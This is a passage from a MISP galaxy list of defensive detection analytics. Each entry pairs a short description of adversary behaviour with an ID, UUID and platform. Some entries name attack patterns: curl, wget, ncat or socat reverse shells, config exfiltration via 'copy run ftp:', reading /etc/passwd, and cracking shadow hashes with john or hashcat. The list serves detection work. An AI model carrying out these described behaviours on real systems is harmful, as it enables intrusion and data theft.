UUID 0aa20e10-ec46-4acf-810e-e8ed038d7744 which can be used as unique global reference for Analytic 0732 - AN0732 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0732
mitre_platforms ['SaaS']

Analytic 0372 - AN0372

Adversary-created named mutex using system APIs (e.g., CreateMutexW) followed by conditional process termination or alternate code path indicating malware avoiding reinfection.

Internal MISP references

UUID 1282f497-ce04-4151-9bd0-4eedbf4530b6 which can be used as unique global reference for Analytic 0372 - AN0372 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0372
mitre_platforms ['Windows']

Analytic 0237 - AN0237

Detection of processes that load or decode encrypted/encoded files in memory and subsequently execute or inject them, indicating payload unpacking or memory-resident malware.

Internal MISP references

UUID 4f985435-9144-4a8f-aca0-598f788855b7 which can be used as unique global reference for Analytic 0237 - AN0237 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0237
mitre_platforms ['Windows']

Analytic 0723 - AN0723

Forged web credentials in Office Suite contexts may appear as abnormal authentication headers in Outlook or Teams traffic, or unexplained OAuth grants in M365/Azure logs. Defenders should correlate token usage events with missing authentication flows and mismatched device/user context.

Internal MISP references

UUID 9735a0b1-df29-49fe-b0f7-973c0b513e8d which can be used as unique global reference for Analytic 0723 - AN0723 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0723
mitre_platforms ['Office Suite']

Analytic 0273 - AN0273

Processes that utilize AppleScript, CGWindowListCopyWindowInfo, or NSRunningApplication APIs to list active application windows and foreground processes.

Internal MISP references

UUID a31400ee-ac3e-408e-aa4d-fb2b470142ab which can be used as unique global reference for Analytic 0273 - AN0273 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0273
mitre_platforms ['macOS']

Analytic 0327 - AN0327

Correlates inbound network access to remote service ports (e.g., SMB/RPC 445/135, RDP 3389, WinRM 5985/5986) with near-time instability in the target service (crash, abnormal restart), suspicious child process creation under the service, and post-access lateral-movement behaviors. The chain indicates likely exploitation rather than normal administration.

Internal MISP references

UUID f8c99f4f-f61e-436c-a093-c97969c9b038 which can be used as unique global reference for Analytic 0327 - AN0327 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0327
mitre_platforms ['Windows']

Analytic 0328 - AN0328

Links inbound network access to SSHD/SMB/NFS/Databases or custom daemons with subsequent daemon crash/restart, core dump, or spawning of shells/reverse shells from the service context, indicating remote exploitation.

Internal MISP references

UUID 70e3066e-6ba3-444b-8e88-dfc3575f2706 which can be used as unique global reference for Analytic 0328 - AN0328 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0328
mitre_platforms ['Linux']

Analytic 0382 - AN0382

Detects hosts transmitting large volumes of SMTP, IMAP, or POP3 traffic to external IPs or relays that aren't associated with the enterprise mail infrastructure.

Internal MISP references

UUID 784b7a50-cdc5-4161-8b52-2be5e5de19ac which can be used as unique global reference for Analytic 0382 - AN0382 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0382
mitre_platforms ['Network Devices']

Analytic 0283 - AN0283

Detects use of tools/scripts accessing input devices like /dev/input/* or evdev via suspicious processes lacking GUI context.

Internal MISP references

UUID 79f3bf7a-cf35-442c-b707-ba4dabd6ed62 which can be used as unique global reference for Analytic 0283 - AN0283 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0283
mitre_platforms ['Linux']

Analytic 0832 - AN0832

Detects execution of archiving utilities (tar, gzip, bzip2, xz, zip, openssl) followed by suspicious archive file creation. Correlates archive creation in temporary or staging directories with execution of commands involving compression or encryption options.

Internal MISP references

UUID 89cfa3ac-22c9-462f-a6a5-b142124e22a5 which can be used as unique global reference for Analytic 0832 - AN0832 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0832
mitre_platforms ['Linux']

Analytic 0823 - AN0823

Detects suspicious DNS/ARP poisoning attempts, unauthorized modifications to registry/network configuration, or abnormal TLS downgrade activity. Correlates changes in system configuration with subsequent unusual network flows or authentication events.

Internal MISP references

UUID c15f60a8-6e58-460f-8dcf-1bce272b5eaf which can be used as unique global reference for Analytic 0823 - AN0823 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0823
mitre_platforms ['Windows']

Analytic 0238 - AN0238

Detection of suspicious use of shell utilities or scripts that decode or decrypt a payload and execute it without writing to disk.

Internal MISP references

UUID e9de9003-46e9-438f-929a-94a33c2eb5bd which can be used as unique global reference for Analytic 0238 - AN0238 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0238
mitre_platforms ['Linux']

Analytic 0239 - AN0239

Detection of encoded payloads being decoded and executed in-memory using scripting tools or third-party decoders.

Internal MISP references

UUID 0e832ea1-a261-4bdd-8fc8-ae049468c347 which can be used as unique global reference for Analytic 0239 - AN0239 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0239
mitre_platforms ['macOS']

Analytic 0329 - AN0329

Detects exploitation targeting ESXi/vCenter by correlating attempts to reach known exploitable endpoints (OpenSLP 427, CIM 5989, Hostd/Vpxa HTTPS 443, ESXi SOAP) with vmkernel/hostd crashes, unexpected hostd/vpxa restarts, or new reverse/outbound connections from ESXi host/vCenter to internal assets.

Internal MISP references

UUID 17b82342-cc75-4dcd-ad98-f313cd2a2b69 which can be used as unique global reference for Analytic 0329 - AN0329 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0329
mitre_platforms ['ESXi']

Analytic 0293 - AN0293

Execution of hash cracking binaries or scripts (e.g., john, hashcat) following access to shadow file or dumped hashes

Internal MISP references

UUID 7efdc4e3-8a2e-4d0d-8ced-03155f2c55ac which can be used as unique global reference for Analytic 0293 - AN0293 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0293
mitre_platforms ['Linux']

Analytic 0923 - AN0923

curl, wget, ncat, socat, or custom binaries initiate outbound traffic to Internet-based proxies (e.g., via VPS or CDN). Behavior may include reverse shell constructs or persistent outbound beacons.

Internal MISP references

UUID 9a0c2390-f8e9-4f03-ae21-0e1e876fed89 which can be used as unique global reference for Analytic 0923 - AN0923 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0923
mitre_platforms ['Linux']

Analytic 0932 - AN0932

Execution of CMSTP.exe with arguments pointing to suspicious or remote INF/SCT/DLL payloads, optionally followed by outbound network connections to untrusted IPs, process injection via COM interfaces (CMSTPLUA, CMLUAUTIL), registry modifications registering malicious profiles, or creation of suspicious INF/DLL/SCT files prior to execution.

Internal MISP references

UUID ae250934-772b-43a5-9a29-9cbd92972858 which can be used as unique global reference for Analytic 0932 - AN0932 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0932
mitre_platforms ['Windows']

Analytic 0392 - AN0392

Detects adversary behavior deleting artifacts (e.g., dropped payloads, evidence files) using native or external utilities (e.g., del, erase, SDelete). Detects deletion events correlated with unusual process lineage or timing post-execution.

Internal MISP references

UUID b1ee9791-91f8-4788-9e08-c40eedbcf08b which can be used as unique global reference for Analytic 0392 - AN0392 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0392
mitre_platforms ['Windows']

Analytic 0244 - AN0244

Detects non-system processes accessing /dev/input/* or issuing ptrace/evdev syscalls used for reading keystroke buffers directly.

Internal MISP references

UUID 0c122a8e-bcb0-4756-8a63-193c52d61d90 which can be used as unique global reference for Analytic 0244 - AN0244 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0244
mitre_platforms ['Linux']

Analytic 0424 - AN0424

Detects file access or compression utilities followed by outbound connections using curl, wget, ftp, or custom binaries communicating over unencrypted protocols.

Internal MISP references

UUID ad5fb8d4-7f1c-4442-a4e5-96592364c4cc which can be used as unique global reference for Analytic 0424 - AN0424 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0424
mitre_platforms ['Linux']

Analytic 0442 - AN0442

Monitor for unauthorized or unusual modifications to cloud resource hierarchies such as AWS Organizations or Azure Management Groups. Defenders may observe anomalous calls to APIs like LeaveOrganization, CreateAccount, MoveAccount, or Azure subscription transfers. Correlate account activity with administrative role assignments, tenant transfers, or new subscription creation that deviates from organizational baselines. Multi-event correlation should track role elevation followed by hierarchy modifications within a short time window.

Internal MISP references

UUID e246212e-aca3-489d-a2d9-7e24f7c3516c which can be used as unique global reference for Analytic 0442 - AN0442 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0442
mitre_platforms ['IaaS']

Analytic 0542 - AN0542

Detection of XProtect or AV quarantining a known tool, followed by modification (file size, hash, string) and subsequent re-execution by the same or related user.

Internal MISP references

UUID 3ef92295-ecbf-417a-b72a-f6cd189ca3a1 which can be used as unique global reference for Analytic 0542 - AN0542 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0542
mitre_platforms ['macOS']

Analytic 0254 - AN0254

Adversary launches built-in system tools (e.g., whoami, query user, net user) or scripts that enumerate user account information via local execution or remote API queries (e.g., WMI, PowerShell).

Internal MISP references

UUID 5d024a50-97d8-4b81-8cc6-3db4fff2712c which can be used as unique global reference for Analytic 0254 - AN0254 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0254
mitre_platforms ['Windows']

Analytic 0425 - AN0425

Detects abnormal outbound HTTP/FTP connections by local scripts or binaries outside of standard browser activity, following access to local documents or user data.

Internal MISP references

UUID b608c89f-ce2c-4993-8522-7b2731851606 which can be used as unique global reference for Analytic 0425 - AN0425 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0425
mitre_platforms ['macOS']

Analytic 0245 - AN0245

Detects unauthorized TCC access or use of Quartz Event Services (CGEventTapCreate) or IOHID for event tap installation within unexpected processes.

Internal MISP references

UUID da140e65-e30c-4cf2-8961-82fb200a7f0b which can be used as unique global reference for Analytic 0245 - AN0245 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0245
mitre_platforms ['macOS']

Analytic 0452 - AN0452

Monitor PAM and syslog entries for unusual frequency of login attempts that trigger MFA prompts, particularly when MFA challenges do not match expected user behavior.

Internal MISP references

UUID e36b2d32-05a8-4bcf-b7cf-58dc3ad4c0d3 which can be used as unique global reference for Analytic 0452 - AN0452 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0452
mitre_platforms ['Linux']

Analytic 0524 - AN0524

Tracks suspicious use of ESXi shell commands or PowerCLI to delete logs, rotate system files, or tamper with hostd/vpxa history.

Internal MISP references

UUID f9b13a61-0110-4882-9384-3468d22ac221 which can be used as unique global reference for Analytic 0524 - AN0524 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0524
mitre_platforms ['ESXi']

Analytic 0246 - AN0246

Keylogging on legacy network devices via unauthorized system image modification or remote capture of console keystrokes (telnet, SSH) through altered firmware or man-in-the-middle key sniffing.

Internal MISP references

UUID 63a1b615-8389-4776-a79c-6db04037a7b7 which can be used as unique global reference for Analytic 0246 - AN0246 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0246
mitre_platforms ['Network Devices']

Analytic 0426 - AN0426

Detects shell-based scripts accessing configuration files or snapshots and transmitting them over unencrypted protocols such as FTP or HTTP to non-management IPs.

Internal MISP references

UUID 82f3feb5-f17e-4c1c-b67d-c8331d220905 which can be used as unique global reference for Analytic 0426 - AN0426 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0426
mitre_platforms ['ESXi']

Analytic 0264 - AN0264

Adversary adds a new Outlook rule with modified or obfuscated PR_RULE_MSG_NAME and PR_RULE_MSG_PROVIDER attributes using MFCMapi or Ruler. Rule is triggered when email arrives, executing embedded or external code. Mailbox audit logs or Unified Audit Log shows automated rule-triggered action without user interaction.

Internal MISP references

UUID 8c0c52d0-7357-4073-84fc-d262632d268f which can be used as unique global reference for Analytic 0264 - AN0264 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0264
mitre_platforms ['Office Suite']

Analytic 0462 - AN0462

Adversary installs/uses packet-capture or raw-socket capability (WinPcap/Npcap, wpcap/packet DLLs or raw socket attach) and sets a filter. A crafted inbound packet is observed; within a short window the host process that loaded capture libraries initiates an outbound connection (e.g., reverse shell) to the packet origin.

Internal MISP references

UUID 98d733c2-370b-4cd0-8ec6-226a1ca19604 which can be used as unique global reference for Analytic 0462 - AN0462 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0462
mitre_platforms ['Windows']

Analytic 0624 - AN0624

Detects remote scripts or binaries deployed via Puppet, Chef, Ansible, or shell scripts from orchestration servers executing outside maintenance windows or in unmanaged nodes.

Internal MISP references

UUID bbb8adb2-434a-483e-af3c-4843241e2158 which can be used as unique global reference for Analytic 0624 - AN0624 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0624
mitre_platforms ['Linux']

Analytic 0642 - AN0642

Suspicious querying of organization-wide directory data via Google Workspace Directory API or Outlook GAL sync in high volume from abnormal users, service accounts, or unknown device contexts.

Internal MISP references

UUID e0ad2e3d-c109-4af0-ac44-0d4cd45407c2 which can be used as unique global reference for Analytic 0642 - AN0642 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0642
mitre_platforms ['Office Suite']

Analytic 0724 - AN0724

Detects file reads across locations followed by writes to temp or staging directories, often compressed or encrypted, indicating local staging behavior.

Internal MISP references

UUID 561fb700-686a-4583-96a9-77a55358d357 which can be used as unique global reference for Analytic 0724 - AN0724 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0724
mitre_platforms ['Windows']

Analytic 0427 - AN0427

Detects use of unencrypted protocols (e.g., TFTP, FTP, HTTP) to transfer configuration files, routing tables, or logs to untrusted IP addresses, especially using administrative commands like copy run ftp:.

Internal MISP references

UUID 611778c2-9de4-4066-b7d1-78752891c32e which can be used as unique global reference for Analytic 0427 - AN0427 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0427
mitre_platforms ['Network Devices']

Analytic 0274 - AN0274

Behavioral chain: (1) An actor creates or modifies a BITS job via bitsadmin.exe, PowerShell BITS cmdlets, or COM; (2) the job performs HTTP(S)/SMB network transfers while the owning user is logged on; (3) upon job completion/error, BITS launches a notify command (SetNotifyCmdLine) from svchost.exe -k netsvcs -s BITS, often establishing persistence by keeping long-lived jobs. The strategy correlates process creation, command/script telemetry, BITS-Client operational events, and network connections initiated by BITS.

Internal MISP references

UUID 6fba9520-c6ce-4a8f-8005-d33546a10406 which can be used as unique global reference for Analytic 0274 - AN0274 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0274
mitre_platforms ['Windows']

Analytic 0742 - AN0742

Abnormal CPU/memory usage by unauthorized processes with outbound connections to known mining pools or using cron jobs/scripts to maintain persistence.

Internal MISP references

UUID 7d099bc4-1a19-4aa3-b12b-a9390e98408a which can be used as unique global reference for Analytic 0742 - AN0742 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0742
mitre_platforms ['Linux']

Analytic 0247 - AN0247

Behavioral sequence where removable media is mounted, files are written/updated, and subsequently read/executed on a separate host, suggesting removable-media relay communication.

Internal MISP references

UUID b355ae5d-3cd6-4594-8bd9-8fed59e02326 which can be used as unique global reference for Analytic 0247 - AN0247 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0247
mitre_platforms ['Windows']

Analytic 0472 - AN0472

Adversary registers a malicious Microsoft Exchange transport agent DLL (.NET assembly), configures it via PowerShell or Exchange Management Shell, and persists code execution by manipulating email processing logic based on rules or headers.

Internal MISP references

UUID c94b2c2b-8885-4f5e-abec-e80ab0a24f21 which can be used as unique global reference for Analytic 0472 - AN0472 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0472
mitre_platforms ['Windows']

Analytic 0284 - AN0284

Monitors for TCC-bypassing or unauthorized access to input services like IOHIDSystem or Quartz Event Services used in keylogging or screen monitoring.

Internal MISP references

UUID 13f8fd10-3982-4a10-85c1-4641712c7286 which can be used as unique global reference for Analytic 0284 - AN0284 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0284
mitre_platforms ['macOS']

Analytic 0842 - AN0842

A remote source rapidly touches a short sequence of closed ports (SYN→RST/S0) on a Windows host. Within a short window the host changes firewall state (WFP rule added/modified or service starts listening) and then the same source completes the first successful handshake to the newly opened port.

Internal MISP references

UUID 22ff1717-6ba8-4908-b795-edf0c41a997e which can be used as unique global reference for Analytic 0842 - AN0842 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0842
mitre_platforms ['Windows']

Analytic 0824 - AN0824

Detects unauthorized edits to /etc/hosts, /etc/resolv.conf, or suspicious ARP broadcasts. Correlates file modifications with subsequent unexpected network sessions or service creation.

Internal MISP references

UUID 3cdef7d3-4ca6-4d4a-933b-656af73f8433 which can be used as unique global reference for Analytic 0824 - AN0824 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0824
mitre_platforms ['Linux']

Analytic 0248 - AN0248

Detection of file write-access to USB-mount directories (e.g., /media/, /run/media/) followed by same-file access or execution on another host.

Internal MISP references

UUID 6f8fdb88-56d1-454e-9a35-3b7170011ca2 which can be used as unique global reference for Analytic 0248 - AN0248 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0248
mitre_platforms ['Linux']

Analytic 0428 - AN0428

Detection of raw access to physical drives, modification of boot records (MBR/VBR), and suspicious file creation or alteration within the EFI System Partition (ESP). Correlates privileged process execution with low-level disk modification and unexpected driver or firmware interactions.

Internal MISP references

UUID 7edc8ff6-0616-4fab-a7b7-1bd3d08cc0b1 which can be used as unique global reference for Analytic 0428 - AN0428 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0428
mitre_platforms ['Windows']

Analytic 0482 - AN0482

Defenders may observe adversary attempts to alter or replace a network device’s operating system image through anomalous CLI commands, unexpected firmware updates, integrity check failures, or mismatches in version and checksum validation. Suspicious behavior includes modification of image files on storage, OS version output inconsistent with baselines, unexpected reloads or reboots after image replacement, and changes to boot configuration that load non-standard system images.

Internal MISP references

UUID 868abb22-3d6c-4172-bf38-9e3c1aba4dae which can be used as unique global reference for Analytic 0482 - AN0482 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0482
mitre_platforms ['Network Devices']

Analytic 0294 - AN0294

Unsigned or scripting-based processes invoking password cracking binaries or accessing hashed credential artifacts post-login

Internal MISP references

UUID 3682e3c9-33a7-4328-b0c5-73c8bbcb9b53 which can be used as unique global reference for Analytic 0294 - AN0294 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0294
mitre_platforms ['macOS']

Analytic 0429 - AN0429

Detection of suspicious write operations to block devices, modifications of bootloader files (GRUB, initrd, vmlinuz), and unexpected changes within the EFI System Partition. Monitors privileged execution of utilities like dd, grub-install, or efibootmgr that modify boot sectors or loader entries.

Internal MISP references

UUID 3d209345-1676-4170-b1d0-d6538bce06c4 which can be used as unique global reference for Analytic 0429 - AN0429 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0429
mitre_platforms ['Linux']

Analytic 0942 - AN0942

Detects execution of AutoHotKey or AutoIT interpreters or compiled scripts used for unauthorized automation, command execution, or payload delivery, correlated with anomalous process lineage, command-line arguments, or script creation events.

Internal MISP references

UUID 7975ae39-8c6b-45cc-9280-98e94b666c85 which can be used as unique global reference for Analytic 0942 - AN0942 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0942
mitre_platforms ['Windows']

Analytic 0492 - AN0492

Automated or scripted HTTP/TLS flooding from one VM or cloud instance against another service, exploiting compute-based billing or exhaustion of service infrastructure.

Internal MISP references

UUID 7dbd928f-da93-4cbf-af73-ac5987a7858a which can be used as unique global reference for Analytic 0492 - AN0492 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0492
mitre_platforms ['IaaS']

Analytic 0249 - AN0249

Correlates removable volume mounts (disk arbitration) with file I/O events on that volume, followed by same file execution shortly after insert.

Internal MISP references

UUID bb687663-4b26-46ef-a176-e188f538d399 which can be used as unique global reference for Analytic 0249 - AN0249 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0249
mitre_platforms ['macOS']

Analytic 0924 - AN0924

AppleScript or terminal sessions launch tools (curl, nc, ssh) to external IPs not commonly accessed. Outbound connections are made by LaunchAgents/LaunchDaemons, often masquerading as system services.

Internal MISP references

UUID cd7fee55-79e6-42f4-9c68-e653cc8a1d24 which can be used as unique global reference for Analytic 0924 - AN0924 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0924
mitre_platforms ['macOS']

Analytic 0255 - AN0255

Adversary runs commands like whoami, id, w, or cat /etc/passwd from non-interactive or scripting contexts to enumerate system user details.

Internal MISP references

UUID 73b31f73-bc47-45c1-9c02-fd8eaacb2f9b which can be used as unique global reference for Analytic 0255 - AN0255 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0255
mitre_platforms ['Linux']

Analytic 0552 - AN0552

Alterations to plist configuration files (RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, MessageRules.plist) that define email hiding or filtering rules. Defender perspective: unexpected changes in these files associated with Mail.app processes.

Internal MISP references

UUID 863a9028-6b2a-46c6-b696-dd310937fbf9 which can be used as unique global reference for Analytic 0552 - AN0552 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0552
mitre_platforms ['macOS']

Analytic 0525 - AN0525

Detects deletion or hiding of security-related mail rules, audit mailboxes, or calendar/log sync artifacts indicative of tampering post-intrusion.

Internal MISP references

UUID c15d6b5e-bbb7-4dc7-8b59-8ce2c0663c05 which can be used as unique global reference for Analytic 0525 - AN0525 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0525
mitre_platforms ['Office Suite']

Analytic 0256 - AN0256

Adversary uses dscl, who, or environment variables like $USER to identify accounts or sessions via Terminal or malicious LaunchAgents.

Internal MISP references

UUID 0979e7f1-9d0a-4549-be8f-88979df5c8d7 which can be used as unique global reference for Analytic 0256 - AN0256 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0256
mitre_platforms ['macOS']

Analytic 0652 - AN0652

Unusual use of steganographic or media processing binaries (e.g., steghide, ffmpeg, imagemagick) followed by outbound communication to external IPs with high data output and media MIME types.

Internal MISP references

UUID 191d5ea7-ff08-4433-ba1b-1c0ed755ca67 which can be used as unique global reference for Analytic 0652 - AN0652 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0652
mitre_platforms ['Linux']

Analytic 0526 - AN0526

Use of AWS STS or GCP IAM APIs to request temporary tokens or federation sessions inconsistent with normal account activity, including from unexpected principals or regions.

Internal MISP references

UUID 43ccb88d-8d8a-4ddb-9ffd-3d897fba76a3 which can be used as unique global reference for Analytic 0526 - AN0526 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0526
mitre_platforms ['IaaS']

Analytic 0265 - AN0265

Account attribute changes (e.g., password set, group membership, servicePrincipalName, logon hours) correlated with unusual process lineage or timing, indicating privilege escalation or persistence via valid accounts.

Internal MISP references

UUID 842ba5ee-dcd0-42bd-9ef8-867a4ab1c703 which can be used as unique global reference for Analytic 0265 - AN0265 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0265
mitre_platforms ['Windows']

Analytic 0625 - AN0625

Detects script or binary execution initiated via JAMF, Munki, or custom MDM agents outside of baseline, or JAMF launching new Terminal or osascript processes from remote command payloads.

Internal MISP references

UUID 94e3c24f-01ee-45bc-89c0-7024ada7cc66 which can be used as unique global reference for Analytic 0625 - AN0625 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0625
mitre_platforms ['macOS']

Analytic 0562 - AN0562

Use of esxcli network commands (e.g., esxcli network nic list, esxcli network ip interface ipv4 get) via SSH or hostd to enumerate adapter and IP information.

Internal MISP references

UUID cb70ad2f-7c96-4669-baed-3007246b0630 which can be used as unique global reference for Analytic 0562 - AN0562 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0562
mitre_platforms ['ESXi']

Analytic 0572 - AN0572

Monitor for execution of hypervisor management commands such as esxcli vm process list or vim-cmd vmsvc/getallvms that enumerate virtual machines. Defenders observe unexpected users issuing VM listing commands outside normal administrative workflows.

Internal MISP references

UUID 44bb0cf8-12ee-4a8f-8701-6c787a008bd8 which can be used as unique global reference for Analytic 0572 - AN0572 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0572
mitre_platforms ['ESXi']

Analytic 0275 - AN0275

Unexpected write operations to BIOS/UEFI firmware regions or EFI boot partitions that do not correlate with legitimate vendor firmware updates. API calls or utilities such as fwupdate.exe or vendor flash tools executed from non-administrative or non-IT management accounts. Suspicious raw disk writes targeting System Firmware GUID partitions followed by abnormal reboot sequences.

Internal MISP references

UUID 59d44906-a35e-4b0f-ab84-df3bfa6df8f9 which can be used as unique global reference for Analytic 0275 - AN0275 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0275
mitre_platforms ['Windows']

Analytic 0257 - AN0257

Adversary executes CLI commands like show users, show ssh, or attempts to dump AAA user lists from routers or switches.

Internal MISP references

UUID a5cc0eac-af18-4fe2-ac06-88a5cfddf014 which can be used as unique global reference for Analytic 0257 - AN0257 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0257
mitre_platforms ['Network Devices']

Analytic 0725 - AN0725

Detects aggregation of files from different directories into /tmp, /mnt, or user-specified directories with archiving tools like tar or gzip.

Internal MISP references

UUID c5e7b8a9-72f6-40db-be4a-ec17386d884f which can be used as unique global reference for Analytic 0725 - AN0725 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0725
mitre_platforms ['Linux']

Analytic 0527 - AN0527

OAuth or SAML access tokens reused across multiple sessions or clients without corresponding MFA or login activity.

Internal MISP references

UUID d203b007-e462-4842-82ce-c97f52c17e39 which can be used as unique global reference for Analytic 0527 - AN0527 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0527
mitre_platforms ['Identity Provider']

Analytic 0752 - AN0752

Remote login via ARD or SSH followed by screensharingd process activity or modification of TCC-protected files.

Internal MISP references

UUID e26778ca-0fd9-4a1b-9d1d-d8ba561b065a which can be used as unique global reference for Analytic 0752 - AN0752 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0752
mitre_platforms ['macOS']

Analytic 0285 - AN0285

Detects web-based credential phishing by analyzing traffic to suspicious URLs that mimic login portals and POST credential content.

Internal MISP references

UUID 6db136be-4e41-4cb7-8237-eee81ee6a3cd which can be used as unique global reference for Analytic 0285 - AN0285 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0285
mitre_platforms ['Network Devices']

Analytic 0825 - AN0825

Detects unauthorized edits to system configuration profiles, unexpected certificate trust changes, or abnormal ARP/DNS patterns indicative of interception.

Internal MISP references

UUID 7535f2e7-d7bb-4e92-8a63-36cd9ccc01be which can be used as unique global reference for Analytic 0825 - AN0825 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0825
mitre_platforms ['macOS']

Analytic 0258 - AN0258

Detects creation or modification of scheduled tasks using schtasks.exe, at.exe, or COM objects followed by execution of outlier processes tied to the scheduled job.

Internal MISP references

UUID a0714b4d-5dbf-499e-a737-7b00478267ee which can be used as unique global reference for Analytic 0258 - AN0258 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0258
mitre_platforms ['Windows']

Analytic 0528 - AN0528

Application access tokens used to call APIs (e.g., Google Workspace, Salesforce) without interactive logins, often with unusual scopes or elevated permissions.

Internal MISP references

UUID dfad1a86-de44-40b2-95b5-9b18c4103cbb which can be used as unique global reference for Analytic 0528 - AN0528 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0528
mitre_platforms ['SaaS']

Analytic 0852 - AN0852

Application crash or repeated restart cycle triggered by malformed input or exploit file, observed via unified logs and process crash monitoring.

Internal MISP references

UUID e6b92e19-5bc8-414b-b200-96ed6d286388 which can be used as unique global reference for Analytic 0852 - AN0852 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0852
mitre_platforms ['macOS']

Analytic 0582 - AN0582

Detects abuse of container orchestration platforms (e.g., Kubernetes) where adversaries create CronJobs to maintain persistence or execute malicious Jobs across the cluster.

Internal MISP references

UUID f2c03ef0-cd36-42b8-9c2d-e25a3b1b8b1c which can be used as unique global reference for Analytic 0582 - AN0582 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0582
mitre_platforms ['Containers']

Analytic 0295 - AN0295

Sudden valid logins from accounts that previously had credentials dumped but had not authenticated successfully in the past; correlated with timeline of suspected hash cracking

Internal MISP references

